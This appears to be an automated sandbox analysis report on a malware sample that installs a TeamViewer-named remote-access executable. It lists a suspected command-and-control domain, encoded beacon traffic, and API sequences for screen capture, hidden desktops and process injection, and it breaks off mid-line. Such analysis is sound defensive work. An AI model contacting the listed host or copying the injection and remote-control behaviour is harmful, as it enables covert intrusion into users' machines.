Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000001.249510284.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000001.263849967.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000001.320706036.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000001.331702639.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.345767662.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000001.347527038.0000000010000000.00000002.00020000.sdmp	String found in binary or memory: http://www.teamviewer.com/licensing/commercialuse.aspx
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000001.249510284.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000001.263849967.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000001.320706036.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000001.331702639.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.345767662.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000001.347527038.0000000010000000.00000002.00020000.sdmp	String found in binary or memory: http://www.teamviewer.com/licensing/register.aspx&http://www.teamviewer.com/r$$id$$.aspx7http://www.
Source: svchost.exe, 0000000A.00000002.510538467.000001D426444000.00000004.00000001.sdmp	String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 0000000A.00000002.510538467.000001D426444000.00000004.00000001.sdmp	String found in binary or memory: https://%s.xboxlive.com
Source: svchost.exe, 0000000A.00000002.510538467.000001D426444000.00000004.00000001.sdmp	String found in binary or memory: https://activity.windows.com
Source: svchost.exe, 0000000C.00000003.308267425.000002A416260000.00000004.00000001.sdmp	String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 0000000A.00000002.510463156.000001D426429000.00000004.00000001.sdmp	String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 0000000A.00000002.510463156.000001D426429000.00000004.00000001.sdmp	String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 0000000C.00000003.308300369.000002A41625E000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000C.00000003.308381147.000002A416259000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000C.00000003.308267425.000002A416260000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 0000000C.00000002.310813443.000002A41623D000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 0000000C.00000003.308381147.000002A416259000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
Source: svchost.exe, 0000000C.00000003.308267425.000002A416260000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 0000000C.00000003.308381147.000002A416259000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000C.00000003.308267425.000002A416260000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 0000000C.00000002.310813443.000002A41623D000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 0000000C.00000003.308267425.000002A416260000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 0000000C.00000003.308267425.000002A416260000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 0000000C.00000003.308267425.000002A416260000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 0000000C.00000003.285739811.000002A416231000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
Source: svchost.exe, 0000000C.00000002.310885401.000002A416242000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 0000000C.00000002.310885401.000002A416242000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 0000000C.00000003.308267425.000002A416260000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 0000000C.00000003.308492112.000002A416240000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.308381147.000002A416259000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 0000000C.00000003.308300369.000002A41625E000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000C.00000003.308381147.000002A416259000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000C.00000003.308381147.000002A416259000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000C.00000003.308218425.000002A416263000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.308300369.000002A41625E000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.t
Source: svchost.exe, 0000000C.00000003.308267425.000002A416260000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 0000000C.00000002.310813443.000002A41623D000.00000004.00000001.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000C.00000003.285739811.000002A416231000.00000004.00000001.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: TeamViewer.exe, 00000006.00000003.384741307.000000000575A000.00000004.00000001.sdmp, TeamViewer.exe, 00000006.00000003.374180078.000000000575A000.00000004.00000001.sdmp, TeamViewer.exe, 00000006.00000003.371647867.000000000575A000.00000004.00000001.sdmp	String found in binary or memory: https://outnegorave.info/
Source: TeamViewer.exe, 00000006.00000003.389888887.000000000575A000.00000004.00000001.sdmp	String found in binary or memory: https://outnegorave.info/#
Source: TeamViewer.exe, 00000006.00000003.395921982.000000000575A000.00000004.00000001.sdmp	String found in binary or memory: https://outnegorave.info/(
Source: TeamViewer.exe, 00000006.00000002.526671283.0000000000B8B000.00000004.00000020.sdmp	String found in binary or memory: https://outnegorave.info/8C631A8/614&p=10000001
Source: TeamViewer.exe, 00000006.00000002.526671283.0000000000B8B000.00000004.00000020.sdmp	String found in binary or memory: https://outnegorave.info/8C631A8/V3e
Source: TeamViewer.exe, 00000006.00000002.526671283.0000000000B8B000.00000004.00000020.sdmp	String found in binary or memory: https://outnegorave.info/8C631A8/icrosoft
Source: TeamViewer.exe, 00000006.00000002.526671283.0000000000B8B000.00000004.00000020.sdmp	String found in binary or memory: https://outnegorave.info/8C631A8/opmentProperties
Source: TeamViewer.exe, 00000006.00000002.526671283.0000000000B8B000.00000004.00000020.sdmp	String found in binary or memory: https://outnegorave.info/8C631A8/opmentProperties:3
Source: TeamViewer.exe, 00000006.00000003.376075558.0000000005749000.00000004.00000001.sdmp, TeamViewer.exe, 00000006.00000003.368823662.000000000575A000.00000004.00000001.sdmp	String found in binary or memory: https://outnegorave.info/B8C631A8/
Source: TeamViewer.exe, 00000006.00000003.376075558.0000000005749000.00000004.00000001.sdmp	String found in binary or memory: https://outnegorave.info/B8C631A8/4
Source: TeamViewer.exe, 00000006.00000003.378667233.000000000575A000.00000004.00000001.sdmp	String found in binary or memory: https://outnegorave.info/B8C631A8/;
Source: TeamViewer.exe, 00000006.00000003.365826240.000000000575A000.00000004.00000001.sdmp	String found in binary or memory: https://outnegorave.info/B8C631A8/=
Source: TeamViewer.exe, 00000006.00000003.395921982.000000000575A000.00000004.00000001.sdmp	String found in binary or memory: https://outnegorave.info/B8C631A8/W
Source: TeamViewer.exe, 00000006.00000002.526671283.0000000000B8B000.00000004.00000020.sdmp	String found in binary or memory: https://outnegorave.info/B8C631A8/lPanel.dll
Source: TeamViewer.exe, 00000006.00000002.526671283.0000000000B8B000.00000004.00000020.sdmp	String found in binary or memory: https://outnegorave.info/B8C631A8/mViewer
Source: TeamViewer.exe, 00000006.00000002.526671283.0000000000B8B000.00000004.00000020.sdmp	String found in binary or memory: https://outnegorave.info/B8C631A8/opmentProperties
Source: TeamViewer.exe, 00000006.00000003.374180078.000000000575A000.00000004.00000001.sdmp	String found in binary or memory: https://outnegorave.info/B8C631A8/q
Source: TeamViewer.exe, 00000006.00000003.365826240.000000000575A000.00000004.00000001.sdmp	String found in binary or memory: https://outnegorave.info/G
Source: TeamViewer.exe, 00000006.00000003.365826240.000000000575A000.00000004.00000001.sdmp	String found in binary or memory: https://outnegorave.info/S
Source: TeamViewer.exe, 00000006.00000003.365826240.000000000575A000.00000004.00000001.sdmp	String found in binary or memory: https://outnegorave.info/e
Source: TeamViewer.exe, 00000006.00000002.526671283.0000000000B8B000.00000004.00000020.sdmp	String found in binary or memory: https://outnegorave.info/ntsSecure-Out)LMEMX
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: svchost.exe, 0000000C.00000002.310813443.000002A41623D000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 0000000C.00000002.310085553.000002A416213000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.310813443.000002A41623D000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000C.00000003.308749567.000002A416245000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000C.00000003.308749567.000002A416245000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000C.00000003.285739811.000002A416231000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 0000000C.00000003.285739811.000002A416231000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 0000000C.00000002.310305376.000002A416224000.00000004.00000001.sdmp	String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen19
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: TeamViewer.exe, 00000006.00000002.526986525.0000000002610000.00000004.00000001.sdmp	String found in binary or memory: https://www.teamviewer.com/buy-now/?utm_medium=masterads&utm_source=master-commercial-use&utm_campai
Source: 77Etc0bR2v.exe, 00000001.00000002.248818109.0000000000409000.00000004.00020000.sdmp, TeamViewer.exe, 00000003.00000001.249510284.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000001.263849967.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000001.320706036.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000001.331702639.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.345767662.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000001.347527038.0000000010000000.00000002.00020000.sdmp	String found in binary or memory: https://www.teamviewer.com/licensing/order.aspx?lng=ja

Source: unknown

DNS traffic detected: queries for: ping3.dyngate.com

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Code function: 3_2_6EAF5A00 InternetOpenA,InternetOpenUrlA,CreateFileA,InternetReadFile,WriteFile,InternetReadFile,WriteFile,CloseHandle,InternetCloseHandle,InternetCloseHandle,

3_2_6EAF5A00

Source: global traffic	HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=10241550&p=10000001 HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dout.aspx?s=39260701&p=10000001&client=DynGate&data=FyQSiQCjHqkys5MkoZ6YmRiamBoamBuTJKIemBMmoKGemDwysbMaMTEZsLKzMLGvmLIZshiyspkxsjGYG7Mwr5kanBybGRgbmRiTJqSiHpg8MrGzGjExGbCyszCxr5iyGbIYsrKZMbIxmBuzMK+ZGpwcmxkYG5kYkyepnqu0txuTKx6YmpcYFxscG5AoqQ== HTTP/1.1Accept: /Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /din.aspx?s=39260701&client=DynGate&p=10000002 HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=7666614&p=10000001 HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dout.aspx?s=39260710&p=10000001&client=DynGate&data=FyQSAAGjHqmyuig6sTY0saWyvJMkoZ6YmRiamBoamBuTJKIemZyYmBmYnBuakyakoh6YPDKxsxoxMRmwsrMwsa+YshmyGLKymTGyMZgbszCvmRqcHJsZGBuZGJMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAAFIAACkpoJiAAgAACIAAAAiHrQD5CYOpp7/Zr7rEi/B/CnsUWehIzsjknPiOAQDnHgKBwxxFKCieiWhL1afx9eeCX4JSt5eDF8v1iZJ9o8IQAaQCrRik6ahUAKNkNBEdbLOE0i1SajuFK2r+FTuYEW7cUOxEu9d8mU9y6bkESGL5okL1ayDi3W7V7M1bCeZL HTTP/1.1Accept: /Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /din.aspx?s=39260710&client=DynGate&p=10000002 HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=7666614&p=10000001 HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dout.aspx?s=39260719&p=10000001&client=DynGate&data=FyQSAwGjHqmyuim0s7cwujq5MqWyvJMkoZ6YmRiamBoamBuTJKIemZyYmBmYnBuakyakoh6YPDKxsxoxMRmwsrMwsa+YshmyGLKymTGyMZgbszCvmRqcHJsZGBuZGJMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAAC+ETh/xoaDswnDrzpj2ezWmEgvX0+Ej1wtEYkKVyn+ydtvyFua/3Iri8RKmf9YcE9fPWO9gKA702VTWXdcuP9paHCFsUzDIqXKZ7SOAdSL0LmDI+BCYg1VARH3ovhl/wWKHhKvbobA55zrvFJv9j5s06datZSDN5Epd+G/FNL5V HTTP/1.1Accept: /Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /din.aspx?s=39260719&client=DynGate&p=10000002 HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=7666614&p=10000001 HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dout.aspx?s=39260736&p=10000001&client=DynGate&data=FyQS+gChtjSytzoeqisoqZMjHqY3s7S3EyOrnpgTI6umMrsyth6aGBgTJDSyMqe3NjS3Mqm6MLo6uZ6YEyQqKignqqoemRMkoZ6YmRiamBoamBuTJKIemZyYmBmYnBuakyWysrgwtjS7Mp6YkyYwtzO6sLOynrUwkyY0sbK3ObKqPLgynpgTJqSiHpg8MrGzGjExGbCyszCxr5iyGbIYsrKZMbIxmBuzMK+ZGpwcmxkYG5kYkyc3p7Mgsbo0uzKlsrK4MLY0uzKemBMpOrc6NLaynpwTKbq4ODe5OjKyIzKwujq5MrmemJMqIagnqqoemBMrHpialxgXGxwbkCip HTTP/1.1Accept: /Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /din.aspx?s=39260736&client=DynGate&p=10000002 HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /din.aspx?s=00000000&m=fast&client=DynGate&rnd=7666614&p=10000001 HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 178.255.154.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /din.aspx?s=12652280&m=fast&client=DynGate&p=10000002 HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 178.255.154.140Connection: Keep-AliveCache-Control: no-cache

Source: unknown

HTTPS traffic detected: 172.67.205.33:443 -> 192.168.2.5:49752 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to record screenshots

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

3_2_6EAF66E0

Contains functionality for read data from the clipboard

Source: C:\Users\user\Desktop\77Etc0bR2v.exe

1_2_00405042

Protection of GUI:

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Code function: 3_2_6EAF9BD0 GetCurrentThreadId,GetThreadDesktop,CreateDesktopA,CreateThread,WaitForSingleObject,CloseHandle,Sleep,CloseDesktop,

3_2_6EAF9BD0

System Summary:

Uses 32bit PE files

Source: 77Etc0bR2v.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\Desktop\77Etc0bR2v.exe	Code function: 1_2_0040323C EntryPoint,73D1E7F0,SetErrorMode,OleInitialize,SHGetFileInfo,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcat,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcat,lstrcmpi,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,	1_2_0040323C
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 3_2_6EAF5B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,FrostCrashedWindow,FrostCrashedWindow,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,	3_2_6EAF5B40
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_6EAF5B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,	6_2_6EAF5B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_6EAF5B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,	8_2_6EAF5B40

Creates files inside the system directory

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Detected potential crypto function

Source: C:\Users\user\Desktop\77Etc0bR2v.exe	Code function: 1_2_00404853	1_2_00404853
Source: C:\Users\user\Desktop\77Etc0bR2v.exe	Code function: 1_2_00406131	1_2_00406131
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_0053C2D6	6_2_0053C2D6
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_004A13AA	6_2_004A13AA
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_0053E430	6_2_0053E430
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_004C97CD	6_2_004C97CD
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_00534810	6_2_00534810
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_005438ED	6_2_005438ED
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_004AC8A9	6_2_004AC8A9
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_00544B6A	6_2_00544B6A
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_004B9F5A	6_2_004B9F5A
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_00546FFB	6_2_00546FFB
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_004A0FB2	6_2_004A0FB2
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 19_3_026CB269	19_3_026CB269

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: String function: 0040F6FE appears 64 times
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: String function: 0053BCB5 appears 478 times
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: String function: 0053E5C8 appears 37 times
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: String function: 0040DFA6 appears 37 times
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: String function: 004A1B0C appears 248 times
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: String function: 0053BCE8 appears 68 times

Contains functionality to launch a process as a different user

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

3_2_6EAF3610

Contains functionality to call native functions

Source: C:\Users\user\Desktop\77Etc0bR2v.exe	Code function: 1_2_00401000 NtdllDefWindowProc_A,BeginPaint,GetClientRect,DeleteObject,CreateBrushIndirect,FillRect,DeleteObject,CreateFontIndirectA,SetBkMode,SetTextColor,SelectObject,SelectObject,DrawTextA,SelectObject,DeleteObject,EndPaint,	1_2_00401000
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 3_2_6EAFB0A0 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,	3_2_6EAFB0A0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 3_2_6EAF8400 NtQuerySystemInformation,RtlZeroMemory,NtQueryVirtualMemory,RtlCompareMemory,NtWriteVirtualMemory,NtFlushInstructionCache,	3_2_6EAF8400
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 3_2_6EAFB270 NtResumeThread,NtClose,HeapFree,	3_2_6EAFB270
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 3_2_6EAFADE0 NtProtectVirtualMemory,	3_2_6EAFADE0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 3_2_6EAFB1F0 NtSuspendThread,NtClose,	3_2_6EAFB1F0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 3_2_6EAFAFC0 NtGetContextThread,NtSetContextThread,	3_2_6EAFAFC0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 3_2_6EAF8510 DisableThreadLibraryCalls,GetModuleHandleA,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryA,ExitProcess,PathAddBackslashA,PathAddBackslashA,GetProcessHeap,HeapAlloc,GetModuleFileNameA,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecA,PathAddBackslashA,SetCurrentDirectoryA,SHGetSpecialFolderPathA,PathAddBackslashA,wsprintfA,GetFileAttributesA,GetFileAttributesA,ExitProcess,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameA,PathFindFileNameA,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,GetProcessHeap,HeapAlloc,GetUserNameW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,wsprintfA,FrostCrashedWindow,FrostCrashedWindow,lstrlenA,GetCommandLineA,CharLowerA,StrToIntA,LocalFree,RtlZeroMemory,FrostCrashedWindow,FrostCrashedWindow,GetPrivateProfileIntA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,ExitProcess,RtlZeroMemory,NtQuerySystemInformation,wsprintfA,wsprintfA,LoadLibraryA,FindWindowW,FindWindowW,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,wsprintfA,LoadLibraryA,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FrostCrashedWindow,FrostCrashe